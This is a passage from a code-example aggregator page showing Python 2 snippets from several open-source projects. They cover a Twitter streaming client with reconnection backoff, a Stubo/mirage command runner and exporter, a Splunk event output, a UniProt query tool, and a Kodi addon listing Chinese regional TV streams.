                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.HTTPError, e:
                                sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                                sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                                # Major error assumed - long backoff
                                if e.code > 200:
                                    if self.backofftime == 1:
                                        self.backofftime = 10
                                    else:
                                        self.backofftime *= 2
                                    if self.backofftime > 240:
                                        self.backofftime = 240
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.URLError, e:
                                sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except socket.timeout, e:
                                sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                    print (str(datetime.utcnow()) + " Disconnecting from twitter stream.")
                    file = open("streamDebug.txt", 'r')
                    filecontents = file.read()
                    file.close()
                    file = open("streamDebug.txt", 'w')
                    file.write(filecontents + "\n" + str(datetime.utcnow()) + " Disconnecting from twitter stream.")
                    file.close()
                    if conn1:
                        conn1.close()
                    if self.backofftime > 1:
                        print ("Backing off for " + str(self.backofftime) + " seconds.")
                        time.sleep(self.backofftime)

Example 37

Project: kamaelia_
Source File: TwitterStream.py
View license
    def main(self):
        twitterurl = "http://stream.twitter.com/1/statuses/filter.json"

        # Configure authentication for Twitter - temporary until OAuth implemented
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, twitterurl, self.username, self.password)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)

        # Configure proxy and opener
        if self.proxy:
            proxyhandler = urllib2.ProxyHandler({"http" : self.proxy})
            twitopener = urllib2.build_opener(proxyhandler, authhandler)
        else:
            twitopener = urllib2.build_opener(authhandler)

        while not self.finished():
            if self.dataReady("inbox"):

                # Receive keywords and PIDs
                recvdata = self.recv("inbox")
                keywords = recvdata[0]

                # Abide by Twitter's keyword limit of 400
                if len(keywords) > 400:
                    sys.stderr.write('TwitterStream keyword list too long - sending shortened list')
                    keywords = keywords[0:400:1]
                    
                pids = recvdata[1]

                # Create POST data
                data = urllib.urlencode({"track": ",".join(keywords)})
                print ("Got keywords: " + data)

                # If using firehose, filtering based on keywords will be carried out AFTER grabbing data
                # This will be done here rather than by Twitter

                # Get ready to grab Twitter data
                urllib2.install_opener(twitopener)
                
                # Identify the client and add a keep alive message using the same timeout assigned to the socket
                headers = {'User-Agent' : "BBC R&D Grabber", "Keep-Alive" : self.timeout, "Connection" : "Keep-Alive"}

                # Connect to Twitter
                try:
                    req = urllib2.Request(twitterurl,data,headers)
                    conn1 = urllib2.urlopen(req,None,self.timeout)
                    self.backofftime = 1 # Reset the backoff time
                    print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                except httplib.BadStatusLine, e:
                    sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except urllib2.HTTPError, e:
                    sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                    sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                    # Major error assumed - long backoff
                    if e.code > 200:
                        if self.backofftime == 1:
                            self.backofftime = 10
                        else:
                            self.backofftime *= 2
                        if self.backofftime > 240:
                            self.backofftime = 240
                    conn1 = False
                except urllib2.URLError, e:
                    sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except socket.timeout, e:
                    sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False

                if conn1:
                    # While no new keywords have been passed in...
                    while not self.dataReady("inbox"):
                        # Collect data from the streaming API as it arrives - separated by carriage returns.
                        try:
                            content = ""
                            # Timer attempt to fix connection hanging
                            # Could possibly force this to generate an exception otherwise - can't be sure if that will stop the read though
                            readtimer = Timer(self.timeout,conn1.close)
                            readtimer.start()
                            while not "\r\n" in content: # Twitter specified watch characters - readline doesn't catch this properly
                                content += conn1.read(1)
                            readtimer.cancel()
                            # Below modified to ensure reconnection is attempted if the timer expires
                            if "\r\n" in content:
                                self.send([content,pids],"outbox") # Send to data collector / analyser rather than back to requester
                                failed = False
                            else:
                                failed = True
                        except IOError, e:
                            sys.stderr.write('TwitterStream IO error: ' + str(e) + '\n')
                            failed = True
                        except Axon.AxonExceptions.noSpaceInBox, e:
                            # Ignore data - no space to send out
                            sys.stderr.write('TwitterStream no space in box error: ' + str(e) + '\n')
                            failed = True
                        except socket.timeout, e:
                            sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                            # General network error assumed - short backoff
                            self.backofftime += 1
                            if self.backofftime > 16:
                                self.backofftime = 16
                            failed = True
                        except TypeError, e:
                            # This pretty much means the connection failed - so let's deal with it
                            sys.stderr.write('TwitterStream TypeError - conn1 failure: ' + str(e) + '\n')
                            failed = True
                        if failed == True and self.reconnect == True:
                            # Reconnection procedure
                            print (str(datetime.utcnow()) + " Streaming API connection failed.")
                            conn1.close()
                            if self.backofftime > 1:
                                print ("Backing off for " + str(self.backofftime) + " seconds.")
                            time.sleep(self.backofftime)
                            print (str(datetime.utcnow()) + " Attempting reconnection...")
                            try:
                                urllib2.install_opener(twitopener)
                                req = urllib2.Request(twitterurl,data,headers)
                                conn1 = urllib2.urlopen(req,None,self.timeout)
                                self.backofftime = 1
                                print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                            except httplib.BadStatusLine, e:
                                sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.HTTPError, e:
                                sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                                sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                                # Major error assumed - long backoff
                                if e.code > 200:
                                    if self.backofftime == 1:
                                        self.backofftime = 10
                                    else:
                                        self.backofftime *= 2
                                    if self.backofftime > 240:
                                        self.backofftime = 240
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.URLError, e:
                                sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except socket.timeout, e:
                                sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                    print (str(datetime.utcnow()) + " Disconnecting from twitter stream.")
                    if conn1:
                        conn1.close()
                    if self.backofftime > 1:
                        print ("Backing off for " + str(self.backofftime) + " seconds.")
                        time.sleep(self.backofftime)

Example 38

Project: mirage
Source File: cmds.py
View license
    def run_command(self, url, priority):
        data = ''
        log.debug('url.path={0}'.format(url.path))
        cmd_path = url.geturl()
        parent_path = self.location(os.path.dirname(self.cmd_file_url))[0] + '/'
        if url.path == 'import/bookmarks':
            loc = parse_qs(url.query).get('location')
            if loc:
                loc = loc[0]
            else:
                raise exception_response(400,
                                         title="missing 'location' param executing import/bookmarks")
            target_url = self.location(urljoin(parent_path, loc))[0]
            log.debug('run_command: {0}'.format(target_url))
            import_cmd_url = self.location(
                'stubo/api/import/bookmarks?location={0}'.format(target_url))[0]
            response, _, status_code = UrlFetch().get(import_cmd_url)
            return status_code

        elif url.path == 'put/stub':
            # Note: delay policy is an optional param, the text matchers & 
            # response start after the first ","
            query, _, matchers_response = url.query.partition(',')
            query_params = parse_qs(query)
            delist_arguments(query_params)
            if 'session' not in query_params:
                raise exception_response(400, title="Missing 'session' param in"
                                                    " query: {0}".format(url.query))
            if 'priority' not in query_params:
                query_params['priority'] = priority
            matchers_response = u''.join(matchers_response.split()).strip()
            matchers_response = matchers_response.split(',')
            response_fname = matchers_response[-1].strip()
            matchers = matchers_response[:-1]
            request_matchers = []
            for matcher in matchers:
                if matcher[:4] == 'url=':
                    matcher_data_url = matcher[4:]
                    matcher_text, _, _ = UrlFetch().get(matcher_data_url)
                elif matcher[:5] == 'text=':
                    matcher_text = matcher[5:]
                else:
                    matcher_data_url = urljoin(parent_path, matcher)
                    matcher_text, _, _ = UrlFetch().get(matcher_data_url)
                request_matchers.append(matcher_text)

            if response_fname[:4] == 'url=':
                response_data_url = response_fname[4:]
                response_text, _, _ = UrlFetch().get(response_data_url)
            elif response_fname[:5] == 'text=':
                response_text = response_fname[5:]
            else:
                response_data_url = urljoin(parent_path, response_fname)
                response_text, hdrs, _ = UrlFetch().get(response_data_url)
                if 'application/json' in hdrs["Content-Type"]:
                    try:
                        response_text = json.dumps(response_text)
                    except Exception:
                        pass

            if not response_text:
                raise exception_response(400,
                                         title="put/stub response text can not be empty.")

            stub_payload = create(request_matchers, response_text)
            cmd_path = url.path + '?{0}'.format(urlencode(query_params))
            url = self.get_url(cmd_path)
            log.debug(u'run_command: {0}'.format(url))
            response = UrlFetch().post(url, data=None, json=stub_payload)
            return response.status_code

        elif url.path == 'get/response':
            # get/response?session=foo_1, my.request
            query, _, request_fname = url.query.partition(',')
            query_params = parse_qs(query)
            if 'session' not in query_params:
                raise exception_response(400, title="Missing 'session' param in"
                                                    " query: {0}".format(url.query))
            request_fname, _, header_args = request_fname.partition(',')
            request_fname = request_fname.strip()

            if request_fname[:4] == 'url=':
                request_data_url = request_fname[4:]
                request_text, _, _ = UrlFetch().get(request_data_url)
            elif request_fname[:5] == 'text=':
                request_text = request_fname[5:]
            else:
                request_data_url = urljoin(parent_path, request_fname)
                request_text, _, _ = UrlFetch().get(request_data_url)
            data = request_text
            cmd_path = url.path + '?{0}'.format(query)
            url = self.get_url(cmd_path)
            log.debug(u'run_command: {0}'.format(url))
            if isinstance(data, dict):
                # payload is json
                encoded_data = json.dumps(data)
            else:
                encoded_data = data.encode('utf-8')
            headers = {'Stubo-Request-Method': 'POST'}
            if header_args:
                headers.update(dict(x.split('=') for x in header_args.split(',')))
            response = UrlFetch().post(url, data=encoded_data, headers=headers)
            return response.status_code

        elif url.path == 'put/delay_policy':
            url = self.get_url(cmd_path)
            log.debug('run_command: {0}, data={1}'.format(url, data))
            _, _, status_code = UrlFetch().get(url)
            return status_code

        url = self.get_url(cmd_path)
        log.debug(u'run_command: {0}'.format(url))
        encoded_data = data.encode('utf-8')
        response = UrlFetch().post(url, data=encoded_data)
        return response.status_code

Example 39

Project: mirage
Source File: export_commands.py
View license
def export_stubs_to_commands_format(handler, scenario_name_key, scenario_name, session_id,
                                    runnable, playback_session, static_dir, export_dir):
    """

    :param handler:
    :param scenario_name_key:
    :param scenario_name:
    :param session_id:
    :param runnable:
    :param playback_session:
    :param static_dir:
    :param export_dir:
    :return: :raise exception_response:
    """
    # cache = Cache(get_hostname(handler.request))
    # scenario_name_key = cache.scenario_key_name(scenario_name)

    # use user arg or epoch time

    if not session_id:
        session_id = int(time.time())
    # session_id = handler.get_argument('session_id', int(time.time()))
    session = u'{0}_{1}'.format(scenario_name, session_id)
    cmds = [
        'delete/stubs?scenario={0}'.format(scenario_name),
        'begin/session?scenario={0}&session={1}&mode=record'.format(
            scenario_name, session)
    ]
    files = []
    scenario = Scenario()
    # get scenario pre stubs for specified scenario
    stubs = list(scenario.get_pre_stubs(scenario_name_key))
    if stubs:
        for i in range(len(stubs)):
            entry = stubs[i]
            stub = Stub(entry['stub'], scenario_name_key)
            # if stub is rest - matcher may be None, checking that
            if stub.contains_matchers() is None:
                cmds.append('# Stub skipped since no matchers were found. Consider using .yaml format for additional '
                            'capabilities')
                # skipping to next stub, this stub is not compatible with .commands format
                continue
            matchers = [('{0}_{1}_{2}.textMatcher'.format(session, i, x), stub.contains_matchers()[x])
                        for x in range(len(stub.contains_matchers()))]
            matchers_str = ",".join(x[0] for x in matchers)
            url_args = stub.args()
            url_args['session'] = session
            module_info = stub.module()
            if module_info:
                # Note: not including put/module in the export, modules are shared
                # by multiple scenarios.
                url_args['ext_module'] = module_info['name']
                url_args['stub_created_date'] = stub.recorded()
                url_args['stubbedSystemDate'] = module_info.get('recorded_system_date')
                url_args['system_date'] = module_info.get('system_date')
            url_args =  urlencode(url_args)
            responses = stub.response_body()
            assert(len(responses) == 1)
            response = responses[0]
            response = ('{0}_{1}.response'.format(session, i), response)
            cmds.append('put/stub?{0},{1},{2}'.format(url_args, matchers_str,
                                                      response[0]))
            files.append(response)
            files.extend(matchers)
    else:
        cmds.append('put/stub?session={0},text=a_dummy_matcher,text=a_dummy_response'.format(session))
    cmds.append('end/session?session={0}'.format(session))

    runnable_info = dict()

    # if this scenario is runnable
    if runnable:
        # playback_session = handler.get_argument('playback_session', None)
        if not playback_session:
            raise exception_response(400,
                                     title="'playback_session' argument required with 'runnable")
        runnable_info['playback_session'] = playback_session

        tracker = Tracker()
        last_used = tracker.session_last_used(scenario_name_key,
                                              playback_session, 'playback')
        if not last_used:
            raise exception_response(400,
                                     title="Unable to find playback session")
        runnable_info['last_used'] = dict(remote_ip=last_used['remote_ip'],
                                          start_time=str(last_used['start_time']))
        playback = tracker.get_last_playback(scenario_name, playback_session,
                                             last_used['start_time'])
        playback = list(playback)
        if not playback:
            raise exception_response(400,
                                     title="Unable to find a playback for scenario='{0}', playback_session='{1}'".format(scenario_name, playback_session))

        cmds.append('begin/session?scenario={0}&session={1}&mode=playback'.format(
            scenario_name, session))
        number_of_requests = len(playback)
        runnable_info['number_of_playback_requests'] = number_of_requests
        for nrequest in range(number_of_requests):
            track = playback[nrequest]
            request_text = track.get('request_text')
            if not request_text:
                raise exception_response(400, title='Unable to obtain playback details, was full tracking enabled?')

            request_file_name = '{0}_{1}.request'.format(session, nrequest)
            files.append((request_file_name, request_text))
            stubo_response_text = track['stubo_response']
            if not isinstance(stubo_response_text, basestring):
                stubo_response_text = unicode(stubo_response_text)
            stubo_response_file_name = '{0}_{1}.stubo_response'.format(session, nrequest)
            files.append((stubo_response_file_name, stubo_response_text))
            url_args = track['request_params']
            url_args['session'] = session
            url_args =  urlencode(url_args)
            cmds.append(u'get/response?{0},{1}'.format(url_args,
                                                       request_file_name))
        cmds.append('end/session?session={0}'.format(session))

    files.append(('{0}.commands'.format(scenario_name),
                  b"\r\n".join(cmds)))

    # checking whether export dir parameter is provided
    if not export_dir:
        export_dir = scenario_name_key.replace(':', '_')
    export_dir_path = os.path.join(static_dir, 'exports', export_dir)

    if os.path.exists(export_dir_path):
        shutil.rmtree(export_dir_path)
    os.makedirs(export_dir_path)

    archive_name = os.path.join(export_dir_path, scenario_name)
    zout = zipfile.ZipFile(archive_name+'.zip', "w")
    tar = tarfile.open(archive_name+".tar.gz", "w:gz")
    for finfo in files:
        fname, contents = finfo
        file_path = os.path.join(export_dir_path, fname)
        with codecs.open(file_path, mode='wb', encoding='utf-8') as f:
            f.write(contents)
        f.close()
        tar.add(file_path, fname)
        zout.write(file_path, fname)
    tar.close()
    zout.close()
    shutil.copy(archive_name+'.zip', archive_name+'.jar')

    files.extend([(scenario_name+'.zip',), (scenario_name+'.tar.gz',),
                  (scenario_name+'.jar',)])
    # getting links
    links = get_export_links(handler, scenario_name_key, files)

    return links

Example 40

Project: eventgen
Source File: splunkstream.py
View license
    def flush(self, q):
        if len(q) > 0:
            # For faster processing, we need to break these up by source combos
            # so they'll each get their own thread.
            # Fixes a bug where we're losing source and sourcetype with bundlelines type transactions
            queues = { }
            for row in q:
                if row['source'] is None:
                    row['source'] = ''
                if row['sourcetype'] is None:
                    row['sourcetype'] = ''
                if not row['source']+'_'+row['sourcetype'] in queues:
                    queues[row['source']+'_'+row['sourcetype']] = deque([])

            # logger.debug("Queues setup: %s" % pprint.pformat(queues))
            m = q.popleft()
            while m:
                queues[m['source']+'_'+m['sourcetype']].append(m)
                try:
                    m = q.popleft()
                except IndexError:
                    m = False

            for k, queue in queues.items():
                splunkhttp = None
                if len(queue) > 0:
                    streamout = ""
                    # SHould now be getting a different output thread for each source
                    # So therefore, look at the first message in the queue, set based on that
                    # and move on
                    metamsg = queue.popleft()
                    msg = metamsg['_raw']
                    try:
                        index = metamsg['index']
                        source = metamsg['source']
                        sourcetype = metamsg['sourcetype']
                        host = metamsg['host']
                        hostRegex = metamsg['hostRegex']
                    except KeyError:
                        pass
                        
                    logger.debug("Flushing output for sample '%s' in app '%s' for queue '%s'" % (self._sample.name, self._app, self._sample.source))
                    try:
                        if self._splunkMethod == 'https':
                            connmethod = httplib.HTTPSConnection
                        else:
                            connmethod = httplib.HTTPConnection
                        splunkhttp = connmethod(self._splunkHost, self._splunkPort)
                        splunkhttp.connect()
                        urlparms = [ ]
                        if index != None:
                            urlparms.append(('index', index))
                        if source != None:
                            urlparms.append(('source', source))
                        if sourcetype != None:
                            urlparms.append(('sourcetype', sourcetype))
                        if hostRegex != None:
                            urlparms.append(('host_regex', hostRegex))
                        elif host != None:
                            urlparms.append(('host', host))
                        url = '/services/receivers/simple?%s' % (urllib.urlencode(urlparms))
                        headers = {'Authorization': "Splunk %s" % self._sample.sessionKey }

                        while msg:
                            if msg[-1] != '\n':
                                msg += '\n'
                            streamout += msg
                            try:
                                msg = queue.popleft()['_raw']
                            except IndexError:
                                msg = False

                        splunkhttp.request("POST", url, streamout, headers)
                        logger.debug("POSTing to url %s on %s://%s:%s with sessionKey %s" \
                                    % (url, self._splunkMethod, self._splunkHost, self._splunkPort, self._sample.sessionKey))

                    except httplib.HTTPException, e:
                        logger.error('Error connecting to Splunk for logging for sample %s.  Exception "%s" Config: %s' % (self._sample.name, e.args, self))
                        raise IOError('Error connecting to Splunk for logging for sample %s' % self._sample)

                    try:
                        response = splunkhttp.getresponse()
                        data = response.read()
                        if response.status != 200:
                            logger.error("Data not written to Splunk.  Splunk returned %s" % data)
                    except httplib.BadStatusLine:
                        logger.error("Received bad status from Splunk for sample '%s'" % self._sample)
                    logger.debugv("Closing splunkhttp connection")
                    if splunkhttp != None:
                        splunkhttp.close()
                        splunkhttp = None

Example 41

Project: jcvi
Source File: uniprot.py
View license
def fetch(args):
    """
    %prog fetch "query"
        OR
    %prog fetch queries.txt

    Please provide a UniProt compatible `query` to retrieve data. If `query` contains
    spaces, please remember to "quote" it.

    You can also specify a `filename` which contains queries, one per line.

    Follow this syntax <http://www.uniprot.org/help/text-search#text-search-syntax>
    to query any of the documented fields <http://www.uniprot.org/help/query-fields>
    """
    import re
    import csv
    p = OptionParser(fetch.__doc__)

    p.add_option("--format", default="tab", choices=valid_formats,
            help="download format [default: %default]")
    p.add_option("--columns", default="entry name, protein names, genes,organism",
            help="columns to download, if --format is `tab` or `xls`." +
            " [default: %default]")
    p.add_option("--include", default=False, action="store_true",
            help="Include isoforms when --format is `fasta` or include `description` when" +
            " --format is `rdf`. [default: %default]");
    p.add_option("--limit", default=10, type="int",
            help="Max number of results to retrieve [default: %default]")
    p.add_option("--offset", default=0, type="int",
            help="Offset of first result, used with --limit [default: %default]")
    p.add_option("--skipcheck", default=False, action="store_true",
            help="turn off prompt to check file existence [default: %default]")
    opts, args = p.parse_args(args)

    if len(args) != 1:
        sys.exit(not p.print_help())

    query, = args
    url_params = {}
    if op.exists(query):
        pf = query.rsplit(".", 1)[0]
        list_of_queries = [row.strip() for row in open(query)]
    else:
        # the query is the search term
        pf = query.strip().strip('\"')
        list_of_queries = [pf]
        pf = re.sub(r"\s+", '_', pf)

    assert len(list_of_queries) > 0, \
        "Please provide atleast one input query"

    url_params['format'] = opts.format

    if opts.columns and opts.format in valid_column_formats:
        reader = csv.reader([opts.columns], skipinitialspace=True)
        cols = [col for r in reader for col in r]
        for col in cols:
            assert col in valid_columns, \
                "Column '{0}' is not a valid. Allowed options are {1}".\
                format(col, valid_columns)
        url_params['columns'] = ",".join(cols)

    if opts.include and opts.format in valid_include_formats:
        url_params['include'] = "yes"

    url_params['limit'] = opts.limit
    url_params['offset'] = opts.offset

    outfile = "{0}.{1}".format(pf, opts.format)

    # If noprompt, will not check file existence
    fw = must_open(outfile, "w", checkexists=True, \
            skipcheck=opts.skipcheck)
    if fw is None:
        return

    seen = set()
    for query in list_of_queries:
        if query in seen:
            logging.error("Duplicate query ({0}) found".format(query))
            continue

        url_params['query'] = query

        data = urllib.urlencode(url_params)
        try:
            request = urllib2.Request(uniprot_url, data)
            response = urllib2.urlopen(request)
        except (urllib2.HTTPError, urllib2.URLError,
                RuntimeError, KeyError) as e:
            logging.error(e)
            logging.debug("wait 5 seconds to reconnect...")
            time.sleep(5)

        page = response.read()
        if not page:
            logging.error("query `{0}` yielded no results".format(query))
            continue

        print >> fw, page

        seen.add(query)

    if seen:
        print >> sys.stderr, "A total of {0} out of {1} queries returned results.".\
                format(len(seen), len(list_of_queries))

Example 42

Project: xbmc-addons-chinese
Source File: addon.py
View license
def main():
	if param.startswith("?stream="):
		def fixURL(tmpurl):
			tmpurl = tmpurl.replace("vtime.cntv.cloudcdn.net:8000", "vtime.cntv.cloudcdn.net") #Global (HDS/FLV) - wrong port
			tmpurl = tmpurl.replace("tv.fw.live.cntv.cn", "tvhd.fw.live.cntv.cn") #China - 403 Forbidden
			return tmpurl
		
		def tryHLSStream(jsondata, subkey):
			print("Trying stream {0}".format(subkey))
			
			if jsondata["hls_url"].has_key(subkey) and jsondata["hls_url"][subkey] != "":
				try:
					tmpurl = jsondata["hls_url"][subkey]
					tmpurl = fixURL(tmpurl)
					
					req = urllib2.Request(tmpurl)
					conn = urllib2.urlopen(req, timeout=TIMEOUT_S)
					conn.read(8) #Try reading a few bytes
					
					return tmpurl
				except Exception:
					print("{0} failed.".format(subkey))
					print(traceback.format_exc())
			
			return None
		
		def tryFLVStream(jsondata, streamName):
			if jsondata["hds_url"].has_key(streamName):
				url = jsondata["hds_url"][streamName]
				url = url + "&hdcore=2.11.3"
				
				return url
		
		pDialog = xbmcgui.DialogProgress()
		pDialog.create(addon.getLocalizedString(30009), addon.getLocalizedString(30010))
		pDialog.update(0)
		try:
			#Locate the M3U8 file
			resp = urllib2.urlopen("http://vdn.live.cntv.cn/api2/live.do?channel=pa://cctv_p2p_hd" + param[8:])
			data = resp.read().decode("utf-8")
			
			if pDialog.iscanceled(): return
			
			url = None
			jsondata = jsonimpl.loads(data)
			
			urlsTried = 0
			urlsToTry = 5
			
			if jsondata.has_key("hls_url"):
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried / urlsToTry * 100, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls1"))
					url = tryHLSStream(jsondata, "hls1")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried / urlsToTry * 100, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls1"))
					url = tryHLSStream(jsondata, "hls2")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried / urlsToTry * 100, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls1"))
					url = tryHLSStream(jsondata, "hls3")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried / urlsToTry * 100, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls1"))
					url = tryHLSStream(jsondata, "hls4")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried / urlsToTry * 100, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls1"))
					url = tryHLSStream(jsondata, "hls5")
			
			if pDialog.iscanceled(): return
			
			#if url is None and jsondata.has_key("hls_url"):
			#	tryHLSStream(jsondata, "hls4")
			
			if url is None:
				showNotification(30002)
				pDialog.close()
				return
			
			print("Loading URL {0}".format(url))
			
			auth = urlparse.parse_qs(urlparse.urlparse(url)[4])["AUTH"][0]
			print("Got AUTH {0}".format(auth))
			
			url = url + "|" + urllib.urlencode( { "Cookie" : "AUTH=" + auth } )
			
			print("Built URL {0}".format(url))
			
			pDialog.close()
			xbmc.Player().play(url)
			
		except Exception:
			showNotification(30000)
			print(traceback.format_exc())
			pDialog.close()
			return

	elif param.startswith("?city="):
		city = param[6:]
		
		def addStream(channelID, channelName):
			li = xbmcgui.ListItem(channelName, iconImage=addon_path + "/resources/media/" + city + ".png")
			xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?stream=" + channelID, listitem=li)
		
		if city == "anhui":
			addStream("anqingxinwen", "安庆新闻综合")
		if city == "beijing":
			addStream("btv2", "BTV文艺")
			addStream("btv3", "BTV科教")
			addStream("btv4", "BTV影视")
			addStream("btv5", "BTV财经")
			addStream("btv6", "BTV体育")
			addStream("btv7", "BTV生活")
			addStream("btv8", "BTV青少")
			addStream("btv9", "BTV新闻")
			addStream("btvchild", "BTV卡酷少儿")
			addStream("btvjishi", "BTV纪实")
			addStream("btvInternational", "BTV国际")
		if city == "tianjin":
			addStream("tianjin1", "天津1套")
			addStream("tianjin2", "天津2套")
			addStream("tianjinbh", "滨海新闻综合")
			addStream("tianjinbh2", "滨海综艺频道")
		if city == "guangxi":
			addStream("gxzy", "广西综艺")
		if city == "guangdong":
			addStream("cztv1", "潮州综合")
			addStream("cztv2", "潮州公共")
			addStream("foshanxinwen", "佛山新闻综合")
			addStream("guangzhouxinwen", "广州新闻")
			addStream("guangzhoujingji", "广州经济")
			addStream("guangzhoushaoer", "广州少儿")
			addStream("guangzhouzonghe", "广州综合")
			addStream("guangzhouyingyu", "广州英语")
			addStream("shaoguanzonghe", "韶关综合")
			addStream("shaoguangonggong", "韶关公共")
			addStream("shenzhencjsh", "深圳财经")
			addStream("zhuhaiyitao", "珠海一套")
			addStream("zhuhaiertao", "珠海二套")
		if city == "sichuan":
			addStream("cdtv1", "成都新闻综合")
			addStream("cdtv2new", "成都经济资讯服务")
			addStream("cdtv5", "成都公共")
		if city == "liaoning":
			addStream("daliannews", "大连一套")
			addStream("liaoningds", "辽宁都市")
		if city == "jiangxi":
			addStream("ganzhou", "赣州新闻综合")
			addStream("nanchangnews", "南昌新闻")
		if city == "hubei":
			addStream("hubeidst", "湖北电视台综合频道")
			addStream("hubeigonggong", "湖北公共")
			addStream("hubeijiaoyu", "湖北教育")
			addStream("hubeitiyu", "湖北体育")
			addStream("hubeiyingshi", "湖北影视")
			addStream("hubeijingshi", "湖北经视")
			addStream("hubeigouwu", "湖北购物")
			addStream("jznews", "荆州新闻频道")
			addStream("wuhanetv", "武汉教育")
			addStream("jzlongs", "湖北垄上频道")
			addStream("xiangyangtai", "襄阳广播电视台")
		if city == "heilongjiang":
			addStream("haerbinnews", "哈尔滨新闻综合")
		if city == "xinjiang":
			addStream("xjtv2", "维语新闻综合")
			addStream("xjtv3", "哈语新闻综合")
			addStream("xjtv5", "维语综艺")
			addStream("xjtv8", "哈语综艺")
			addStream("xjtv9", "维语经济生活")
		if city == "hebei":
			addStream("hebeinongmin", "河北农民频道")
			addStream("hebeijingji", "河北经济")
			addStream("shijiazhuangyitao", "石家庄一套")
			addStream("shijiazhuangertao", "石家庄二套")
			addStream("shijiazhuangsantao", "石家庄三套")
			addStream("shijiazhuangsitao", "石家庄四套")
			addStream("xingtaizonghe", "邢台综合")
			addStream("xingtaishenghuo", "邢台生活")
			addStream("xingtaigonggong", "邢台公共")
			addStream("xingtaishahe", "邢台沙河")
		if city == "shandong":
			addStream("jinannews", "济南新闻")
			addStream("qingdaonews", "青岛新闻综合")
			addStream("yantaixinwenzonghe", "烟台新闻综合")
			addStream("yantaixinjingjishenghuo", "烟台经济生活")
			addStream("yantaigonggong", "烟台公共频道")
		if city == "gansu":
			addStream("jingcailanzhou", "睛彩兰州")
		if city == "yunnan":
			addStream("lijiangnews", "丽江新闻综合频道")
			addStream("lijiangpublic", "丽江公共频道")
		if city == "neimenggu":
			addStream("neimenggu2", "蒙语频道")
			addStream("neimengwh", "内蒙古文化频道")
		if city == "jiangsu":
			addStream("nanjingnews", "南京新闻")
			addStream("nantongxinwen", "南通新闻频道")
			addStream("nantongshejiao", "南通社教频道")
			addStream("nantongshenghuo", "南通生活频道")
			addStream("wuxixinwenzonghe", "无锡新闻综合")
			addStream("wuxidoushizixun", "无锡都市资讯")
			addStream("wuxiyuele", "无锡娱乐")
			addStream("wuxijingji", "无锡经济")
			addStream("wuxiyidong", "无锡移动")
			addStream("wuxishenghuo", "无锡生活")
		if city == "zhejiang":
			addStream("nbtv1", "宁波一套")
			addStream("nbtv2", "宁波二套")
			addStream("nbtv3", "宁波三套")
			addStream("nbtv4", "宁波四套")
			addStream("nbtv5", "宁波五套")
		if city == "shanghai":
			addStream("shnews", "上海新闻综合")
		if city == "fujian":
			addStream("xiamen1", "厦门一套")
			addStream("xiamen2", "厦门二套")
			addStream("xiamen3", "厦门三套")
			addStream("xiamen4", "厦门四套")
			addStream("xiamenyidong", "厦门移动")
		if city == "shaanxi":
			addStream("xiannews", "西安新闻")
		if city == "xizang":
			addStream("xizang2", "藏语频道")
		if city == "jilin":
			addStream("yanbianguangbo", "延边卫视视频广播")
			addStream("yanbianam", "延边卫视AM")
